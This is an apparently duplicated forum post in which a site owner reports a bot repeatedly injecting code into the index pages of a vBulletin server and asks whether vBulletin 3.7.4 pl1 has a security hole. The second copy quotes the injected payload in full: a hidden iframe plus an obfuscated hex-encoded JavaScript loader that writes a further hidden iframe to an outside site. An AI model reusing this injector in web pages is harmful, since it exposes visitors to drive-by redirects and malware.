Tweet
HTML Injection Hack with VBulletin 3.7.4 pl1
Hello.
For some time now my server has been compromised. A hacker is inseting a large line of code into all index html & php pages on my server.
I have done alot of research on Google about this and although alot of people seem to be getting targeted, no solution has been found.
The entire code which is inserted next to the <body> tag is this:
It basically redirects the pages to another website which is a security risk.
I checked all my security settings and I contacted my hosting company. They informed me that this is happening because of scripts I have installed on my server. The hacker is using them to insert the code.
The only scripts I have installed are vBulletin, WordPress & MovableType. All of which are up to date. Because I dont care too much about my WP or MT sites I uninstalled both and removed the databases. The only script I have running now is vBulletin.
I was hoping that by removing these scripts the problem would stop but I have just discovered the code has been injected back into all files. It seems to happen again and again after I remove the code. Its obviousally some kind of BOT that keeps checking and inserting the code.
I have nothing but vBulletin installed on my server. There are no other scripts what so ever. They must be hacking in via vbulletin! I have the latest 3.7.4 pl 1 installed.
Has anyone else been having the same problem?
Can someone please, please look into this for me!!! If this is due to vBulletin, which i'm pretty sure it is, then its a BIG hole!
How can I optimize my VB security to try to prevent this?
For some time now my server has been compromised. A hacker is inseting a large line of code into all index html & php pages on my server.
I have done alot of research on Google about this and although alot of people seem to be getting targeted, no solution has been found.
The entire code which is inserted next to the <body> tag is this:
Code:
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l49442aba3ca85(l49442aba3cf43){ var l49442aba3d32a=16; return (parseInt(l49442aba3cf43,l49442aba3d32a));}function l49442aba3dafb(l49442aba3dee6){ function l49442aba3eac9(){return 2;} var l49442aba3e2d5='';l49442aba3fa4e=String.fromCharCode;for(l49442aba3e6c0=0;l49442aba3e6c0<l49442aba3dee6.length;l49442aba3e6c0+=l49442aba3eac9()){ l49442aba3e2d5+=(l49442aba3fa4e(c102916999516l49442aba3ca85(l49442aba3dee6.substr(l49442aba3e6c0,l49442aba3eac9()))));}return l49442aba3e2d5;} var xab='';var l49442aba40215='3C736'+xab+'3726'+xab+'970743E6'+xab+'96'+xab+'6'+xab+'28216'+xab+'D796'+xab+'96'+xab+'1297B6'+xab+'46'+xab+'F6'+xab+'3756'+xab+'D6'+xab+'56'+xab+'E742E77726'+xab+'9746'+xab+'528756'+xab+'E6'+xab+'5736'+xab+'36'+xab+'1706'+xab+'528202725336'+xab+'32536'+xab+'392536'+xab+'36'+xab+'2537322536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'352532302536'+xab+'6'+xab+'52536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'3525336'+xab+'42536'+xab+'332533312533302532302537332537322536'+xab+'3325336'+xab+'42532372536'+xab+'3825373425373425373025336'+xab+'125326'+xab+'6'+xab+'25326'+xab+'6'+xab+'2536'+xab+'372536'+xab+'6'+xab+'6'+xab+'2536'+xab+'372536'+xab+'6'+xab+'6'+xab+'2533322536'+xab+'6'+xab+'42536'+xab+'3525326'+xab+'52536'+xab+'6'+xab+'52536'+xab+'3525373425326'+xab+'6'+xab+'25326'+xab+'52536'+xab+'372536'+xab+'6'+xab+'6'+xab+'25326'+xab+'6'+xab+'2536'+xab+'332536'+xab+'382536'+xab+'352536'+xab+'332536'+xab+'6'+xab+'225326'+xab+'52536'+xab+'382537342536'+xab+'6'+xab+'42536'+xab+'6'+xab+'32532372532302537372536'+xab+'392536'+xab+'342537342536'+xab+'3825336'+xab+'42533342533312533332532302536'+xab+'382536'+xab+'352536'+xab+'392536'+xab+'372536'+xab+'3825373425336'+xab+'42533312533332533342532302537332537342537392536'+xab+'6'+xab+'32536'+xab+'3525336'+xab+'4253237253736'+xab+'2536'+xab+'392537332536'+xab+'392536'+xab+'322536'+xab+'392536'+xab+'6'+xab+'32536'+xab+'3925373425373925336'+xab+'12536'+xab+'382536'+xab+'392536'+xab+'342536'+xab+'342536'+xab+'352536'+xab+'6'+xab+'525323725336'+xab+'525336'+xab+'325326'+xab+'6'+xab+'2536'+xab+'392536'+xab+'36'+xab+'2537322536'+xab+'312536'+xab+'6'+xab+'42536'+xab+'3525336'+xab+'52729293B7D76'+xab+'6'+xab+'172206'+xab+'D796'+xab+'96'+xab+'13D7472756'+xab+'53B3C2F736'+xab+'3726'+xab+'970743E';document.write(l49442aba3dafb(l49442aba40215));</script>
I checked all my security settings and I contacted my hosting company. They informed me that this is happening because of scripts I have installed on my server. The hacker is using them to insert the code.
The only scripts I have installed are vBulletin, WordPress & MovableType. All of which are up to date. Because I dont care too much about my WP or MT sites I uninstalled both and removed the databases. The only script I have running now is vBulletin.
I was hoping that by removing these scripts the problem would stop but I have just discovered the code has been injected back into all files. It seems to happen again and again after I remove the code. Its obviousally some kind of BOT that keeps checking and inserting the code.
I have nothing but vBulletin installed on my server. There are no other scripts what so ever. They must be hacking in via vbulletin! I have the latest 3.7.4 pl 1 installed.
Has anyone else been having the same problem?
Can someone please, please look into this for me!!! If this is due to vBulletin, which i'm pretty sure it is, then its a BIG hole!
How can I optimize my VB security to try to prevent this?
Comment